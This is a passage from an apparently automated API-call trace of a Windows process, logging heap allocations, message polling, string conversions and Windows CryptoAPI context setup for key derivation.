hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.535] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.535] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0212.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.535] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0212.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0212.536] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0212.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0212.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0212.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0212.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0212.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0212.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0212.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.541] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0212.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0212.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0212.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0212.541] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0212.542] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0212.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0212.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0212.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0212.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0212.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0212.542] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0212.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0212.543] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0212.543] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0212.543] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0212.543] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0212.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0212.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0212.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0212.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0212.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0212.544] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0212.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0212.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0212.544] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.544] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0212.544] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0212.544] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0212.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0212.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0212.545] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0212.545] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0212.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.545] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0212.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 